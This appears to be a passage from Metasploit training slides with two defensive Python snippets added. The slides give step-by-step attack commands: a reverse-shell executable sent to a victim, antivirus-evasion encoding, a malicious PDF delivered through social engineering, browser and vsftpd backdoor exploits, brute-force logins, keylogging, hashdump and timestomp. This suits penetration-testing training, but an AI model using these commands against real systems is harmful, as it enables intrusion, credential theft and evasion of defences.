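    if direction not in ("reverse", "bind"):
        return None, None
    return direction, transport.split("_")[0] or None


def parse_payload(name: str) -> PayloadInfo:
    parts = name.lower().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if len(rest) > 1 and rest[0] in ARCHES else None
    if len(rest) == 1:
        # Single payload (windows/shell_bind_tcp): stage, then the connector
        # glued on with '_' (windows/adduser has no connector at all).
        stage, _, connector = rest[0].partition("_")
        direction, transport = _split_connector(connector) if connector else (None, None)
        return PayloadInfo(platform, arch, "single", stage,
                           connector if direction else None, direction, transport)
    if len(rest) == 2:
        # Staged payload (windows/shell/bind_tcp): stage first, stager second.
        stage, stager = rest
        direction, transport = _split_connector(stager)
        return PayloadInfo(platform, arch, "staged", stage, stager, direction, transport)
    raise ValueError(f"unsupported layout (cmd/* payloads are out of scope): {name!r}")


def expected_artifact(info: PayloadInfo, lhost: str, lport: int) -> str:
    """What a defender should look for once this payload runs, given the
    LHOST/LPORT the handler was configured with."""
    if info.direction == "reverse":
        where = f"outbound {info.transport} connection from the victim to {lhost}:{lport}"
    elif info.direction == "bind":
        where = f"new listening {info.transport} port {lport} on the victim"
    else:
        return f"no network connector: {info.stage} runs locally on the victim"
    if info.kind == "staged":
        where += f", over which the {info.stage} stage is downloaded first"
    return where
```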
15. MSFConsole
  • Most powerful interface among all the interfaces

18. Armitage
  • Graphical version of Metasploit
  • Developed by Raphael Mudge
  • Supports both GUI and CLI

20. Basic Commands
  • # msfconsole
  • # msfupdate
  • MSFConsole commands are classified in two types:
    • Core commands
    • Database commands

21. Core Commands
  • help or ?
  • banner
  • version
  • show
  • search
    • msf > search <module name>
  • info
    • msf > info <module name>
  • use
    • msf > use <exploit/auxiliary name>

22. Core Commands
  • back
  • show options
  • set
    • msf > set <option> <value>
  • setg
    • msf > setg <option> <value>
  • unset
    • msf > unset <option>
  • unsetg
    • msf > unsetg <option>

23. Core Commands
  • show payloads
  • set payload
    • msf > set payload <payload name>
  • check
  • exploit
  • run

24. Database Commands
  • Default database: PostgreSQL
  • database.yml
    • /opt/metasploit/apps/pro/ui/config/database.yml
    • # cat database.yml
  • db_status
  • db_disconnect

26. Database Commands
  • db_nmap
    • # db_nmap -sV -A -O <ip range>
  • hosts
    • # hosts -h
  • services
    • # services

27. Database Commands
  • vulns
  • db_export
  • db_import
  • db_rebuild_cache
  • creds
  • db_load
  • db_unload

28. Information Gathering
  • Auxiliary modules are the best!
  • Will be covered in detail later
  • Using auxiliary/scanner/portscan/tcp
    • msf > use auxiliary/scanner/portscan/tcp
  • Or
    • nmap <switches> <ip address>

29. Exploitation
  • To list available exploits:
    • msf > search <exploit name>
  • To select an exploit:
    • msf > use <exploit name>
  • To get information about the selected exploit:
    • msf exploit(exploitname) > info
  • To check the options and set arguments:
    • msf exploit(exploitname) > show options
  • To set the target host:
    • msf exploit(exploitname) > set rhost <victim ip>

30. Exploitation
  • To list the payloads supported by the selected exploit:
    • msf exploit(exploitname) > show payloads
  • To set the payload:
    • msf exploit(exploitname) > set payload <payload name>
  • To set the attacker machine:
    • msf exploit(exploitname) > set lhost <own ip>
  • To check if the target is vulnerable to the selected exploit:
    • msf exploit(exploitname) > check
  • To launch the attack:
    • msf exploit(exploitname) > exploit

31.

32. Meterpreter
  • Post exploitation module
  • Runs in the exploited process context
  • Runs in memory and doesn't create any file on disk
  • Encrypted communication
  • Stable and extensible

33. Meterpreter
  • Classification
    • Core commands
    • File system commands
    • System commands
    • User interface commands
    • Priv commands
    • Networking commands

34. Meterpreter: Core Commands
  • background
  • sessions
  • ps
  • migrate
  • bgrun/bglist/bgkill
  • resource

35. Meterpreter: Core Commands
  • run
    • meterpreter > run <script name>
  • channel
    • meterpreter > execute -f <program> -c
  • use
    • meterpreter > use <extension name>

36. Meterpreter: File System Commands
  • pwd
  • cd
  • getlwd/getlcd
  • ls
  • cat/edit
  • download/upload

37. Meterpreter: File System Commands
  • search
    • meterpreter > search -d <directory> -f *.<fileformat> -r
  • mkdir/rmdir
  • rm/rmdir
  • del

38. Meterpreter: System Commands
  • sysinfo
  • getpid/getuid
  • shell
  • reboot
  • shutdown
  • ps

39. Meterpreter: UI Commands
  • User interface and webcam commands
  • idletime
  • keyscan_start
  • keyscan_dump
  • keyscan_stop
  • webcam_list
  • webcam_snap

40. Meterpreter: Priv Commands
  • getsystem
  • hashdump
  • timestomp
    • timestomp -h
    • timestomp <filepath> -v (to display all attributes)
    • timestomp <filepath> -c <MM/DD/YYYY H:M:S>

41. Meterpreter: Networking Commands
  • arp
  • ipconfig/ifconfig
  • netstat
  • route
  • portfwd

42. Meterpreter Scripts
  • Path:
    • /usr/share/metasploit-framework/scripts/meterpreter
  • Or
    • meterpreter > run <tab multiple times>

43. Meterpreter Scripts
  • run <script name>
  • run checkvm
  • run credcollect
  • run keylogrecorder
  • run winenum
  • run getcountermeasure
  • run getgui

44. Meterpreter Scripts
  • run scraper
  • run hostedit
  • run gettelnet
  • run arpscanner
  • run vnc
  • run filecollector
    • meterpreter > run filecollector -d <dnm> -f *.txt -r

45.

46. Metasploit Utilities
  • Three main utilities to generate shellcode and to evade antiviruses:
    • msfpayload
    • msfencode
    • msfvenom

47. Msfpayload
  • Generates a payload in different formats such as exe, C, Ruby and JavaScript
  • Using msfpayload:
    • root@kali:~# msfpayload -h
  • To check options:
    • root@kali:~# msfpayload <payload name> O
    • root@kali:~# msfpayload windows/meterpreter/reverse_tcp O
  • Setting the options:
    • root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe
  • Send this exploit.exe to the victim

48. Using the multi/handler Exploit / Setting up a Listener
  • Setup listener:
    • msf > search multi/handler
    • msf > use exploit/multi/handler
    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    • msf exploit(handler) > show options
    • msf exploit(handler) > set lhost <attacker ip>
    • msf exploit(handler) > set lport 4422
    • msf exploit(handler) > exploit

49. MSFEncode
  • To bypass antiviruses
  • Encodes the payload and wraps it in a binary EXE; when the file runs, the decoder stub decodes the payload in memory and executes it
  • The payload is encoded by different encoders

50. MSFEncode
  • root@kali:~# msfencode -h
  • Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>
  • OPTIONS:
    • -e <opt>  The encoder to use
    • -c <opt>  The number of times to encode the data
    • -t <opt>  The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe
    • -x <opt>  Specify an alternate executable template
    • -k        Keep template working; run payload in new thread (use with -x)

51. MSFEncode
  • List encoders:
    • root@kali:~# msfencode -l
  • msfencode with msfpayload:
    • root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe

52. Client-side Attacks
  • Difficult to find server-side vulnerabilities
  • Most enterprises have incoming connections locked down with firewalls
  • Client-side attacks are the most common ones:
    • Browser-based attacks
    • Social engineering attacks using a malicious link or file

53. Client-side Attacks: Browser Based
  • Using the IE 6 based Aurora exploit
    • msf > search aurora
    • msf > use exploit/windows/browser/ms10_002_aurora
    • msf exploit(ms10_002_aurora) > show options
    • msf exploit(ms10_002_aurora) > set srvhost <attacker ip>
    • msf exploit(ms10_002_aurora) > set srvport 80
    • msf exploit(ms10_002_aurora) > set uripath /test

54. Client-side Attacks: Browser Based
    • msf exploit(ms10_002_aurora) > show options
    • msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
    • msf exploit(ms10_002_aurora) > show options
    • msf exploit(ms10_002_aurora) > set lhost <own ip>
    • msf exploit(ms10_002_aurora) > set lport 443
    • msf exploit(ms10_002_aurora) > exploit

55. Client-side Attacks: File Format
  • Nowadays file format based exploits are exploiting targets in the wild.
  • Files in formats such as PDF, DOC or RTF are sent as attachments to the victim, who is expected to open them.
  • For eg:
    • Adobe util.printf() buffer overflow vulnerability
    • MS14-017 Microsoft Word RTF Object Confusion

56. Client-side Attacks: File Format
  • Exploiting the Adobe util.printf() buffer overflow vulnerability
    • msf > search adobe_utilprintf
    • msf > use exploit/windows/fileformat/adobe_utilprintf
    • msf exploit(adobe_utilprintf) > set filename resume.pdf
    • msf exploit(adobe_utilprintf) > show options
    • msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp

57. Client-side Attacks: File Format
    • msf exploit(adobe_utilprintf) > setg lhost <attacker ip>
    • msf exploit(adobe_utilprintf) > set lport 443
    • msf exploit(adobe_utilprintf) > exploit
  • Set up a listener (i.e. multi/handler)
  • Send this resume.pdf using some social engineering technique.

58. Client-side Attacks: File Format
  • Setting up the listener on the local machine:
    • msf > search multi/handler
    • msf > use exploit/multi/handler
    • msf exploit(handler) > show options
    • msf exploit(handler) > set lhost <own ip>
    • msf exploit(handler) > set lport 443
    • msf exploit(handler) > exploit

59.

60. Auxiliary Modules
  • Pre-exploitation modules
  • Port scanners, fuzzers, banner grabbers, brute-force modules etc.
  • Path:
    • /usr/share/metasploit-framework/modules/auxiliary
  • Or, using show auxiliary in msfconsole:
    • msf > show auxiliary
  • Used without payloads

61. Auxiliary Modules
  • Used the same way as exploits, but without a payload
    • msf > use <auxiliary name>
  • 'run' command instead of 'exploit' command
  • RHOSTS instead of RHOST

62. Auxiliary Modules: Port Scanners
  • The portscan auxiliary modules are used for port scanning
  • Using portscanners:
    • msf > search portscan
    • msf > use auxiliary/scanner/portscan/tcp
    • msf auxiliary(tcp) > show options
    • msf auxiliary(tcp) > set rhosts <target>
    • msf auxiliary(tcp) > set ports 1-100
    • msf auxiliary(tcp) > set threads 10
    • msf auxiliary(tcp) > run

63. Auxiliary Modules: SMB Version Fingerprinting
    • msf > search smb_version
    • msf > use auxiliary/scanner/smb/smb_version
    • msf auxiliary(smb_version) > show options
    • msf auxiliary(smb_version) > set rhosts 192.168.37.0/24
    • msf auxiliary(smb_version) > set threads 10
    • msf auxiliary(smb_version) > run

64. Auxiliary Modules: Version Scanner
  • Banner grabbing of a MySQL server:
    • msf > search MySQL
    • msf > use auxiliary/scanner/mysql/mysql_version
    • msf auxiliary(mysql_version) > show options
    • msf auxiliary(mysql_version) > set rhosts <target>
    • msf auxiliary(mysql_version) > run

65. Auxiliary Modules: Login Scanners
  • Testing a login attack on MySQL:
    • msf > use auxiliary/scanner/mysql/mysql_login
    • msf auxiliary(mysql_login) > show options
    • msf auxiliary(mysql_login) > setg rhosts <target>
    • msf auxiliary(mysql_login) > set user_file userfile.txt

66. Auxiliary Modules: Login Scanners
    • msf auxiliary(mysql_login) > set pass_file passfile.txt
    • msf auxiliary(mysql_login) > set stop_on_success true
    • msf auxiliary(mysql_login) > run

67. Auxiliary Modules: Telnet
    • msf > search telnet_login
    • msf > use auxiliary/scanner/telnet/telnet_login
    • msf auxiliary(telnet_login) > show options
    • msf auxiliary(telnet_login) > setg rhosts <target ip>
    • msf auxiliary(telnet_login) > set user_file userfile.txt

68. Auxiliary Modules: Telnet
    • msf auxiliary(telnet_login) > set pass_file passfile.txt
    • msf auxiliary(telnet_login) > set stop_on_success true
    • msf auxiliary(telnet_login) > run
  • Verify:
    • root@kali:~# telnet <target ip>

69. Auxiliary Modules: Attacking FTP
    • msf > search ftp_version
    • msf > use auxiliary/scanner/ftp/ftp_version
    • msf auxiliary(ftp_version) > show options
    • msf auxiliary(ftp_version) > set rhosts <target>
    • msf auxiliary(ftp_version) > run
  • Result on Metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)

70. Auxiliary Modules: Attacking FTP
  • Now checking for FTP login
    • msf > search ftp_login
    • msf > use auxiliary/scanner/ftp/ftp_login
    • msf auxiliary(ftp_login) > set rhosts <target ip>
    • msf auxiliary(ftp_login) > set user_file userfile.txt
    • msf auxiliary(ftp_login) > set pass_file passfile.txt
    • msf auxiliary(ftp_login) > set stop_on_success true
    • msf auxiliary(ftp_login) > run
  • Successful FTP login for 'msfadmin':'msfadmin'
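The login scanners on slides 65 to 70 (mysql_login, telnet_login, ftp_login) leave the same footprint on the target: a burst of failed logins from one client and, with stop_on_success, a single success right after. As an added example that is not part of the slides, the Python below runs that detection logic over constructed vsftpd.log-style lines; the log lines, client addresses and thresholds are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in vsftpd.log style (not captured from a real host): one
# client cycles through a user/password list and stops at the first success,
# a second client logs in normally once.
SAMPLE_LOG = """\
Tue Mar 19 10:00:01 2024 [pid 2101] CONNECT: Client "192.168.37.5"
Tue Mar 19 10:00:01 2024 [pid 2100] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Tue Mar 19 10:00:02 2024 [pid 2104] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Tue Mar 19 10:00:02 2024 [pid 2108] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Tue Mar 19 10:00:03 2024 [pid 2112] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Tue Mar 19 10:00:03 2024 [pid 2116] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Tue Mar 19 10:00:04 2024 [pid 2120] [msfadmin] OK LOGIN: Client "192.168.37.5"
Tue Mar 19 10:07:30 2024 [pid 2300] [alice] OK LOGIN: Client "192.168.37.9"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<event>FAIL LOGIN|OK LOGIN|CONNECT): Client "(?P<ip>[^"]+)"')


def parse_line(line):
    """Return (timestamp, client_ip, event, user) or None for lines we don't model."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    return ts, m["ip"], m["event"], m["user"]


def detect_bruteforce(log_text, max_failures=5, window_seconds=60):
    """Flag clients with >= max_failures failed logins inside window_seconds and
    record whether a successful login followed (the stop_on_success pattern)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] in ("FAIL LOGIN", "OK LOGIN"):
            events[rec[1]].append(rec)
    alerts = {}
    for ip, recs in events.items():
        recs.sort()
        fails = [r for r in recs if r[2] == "FAIL LOGIN"]
        for i in range(len(fails) - max_failures + 1):
            first, last = fails[i][0], fails[i + max_failures - 1][0]
            if (last - first).total_seconds() <= window_seconds:
                success = next((r for r in recs if r[2] == "OK LOGIN" and r[0] >= last), None)
                alerts[ip] = {"failures": len(fails),
                              "users": sorted({r[3] for r in fails}),
                              "success_after_failures": success[3] if success else None}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```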
71. Auxiliary Modules: Attacking FTP
  • From the FTP version scan we know the version is vsFTPd 2.3.4
  • Now looking for an exploit for this FTP version
    • msf > search vsFTPd 2.3.4
    • msf > use exploit/unix/ftp/vsftpd_234_backdoor
    • msf exploit(vsftpd_234_backdoor) > show options
    • msf exploit(vsftpd_234_backdoor) > set rhost <target ip>
    • msf exploit(vsftpd_234_backdoor) > show payloads
    • msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
    • msf exploit(vsftpd_234_backdoor) > exploit

72.

73. References
  • Metasploit Guide, http://packetstormsecurity.com/files/119280
  • SecurityTube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)
  • Metasploit Unleashed, http://www.offensive-security.com/metasploit-unleashed/Main_Page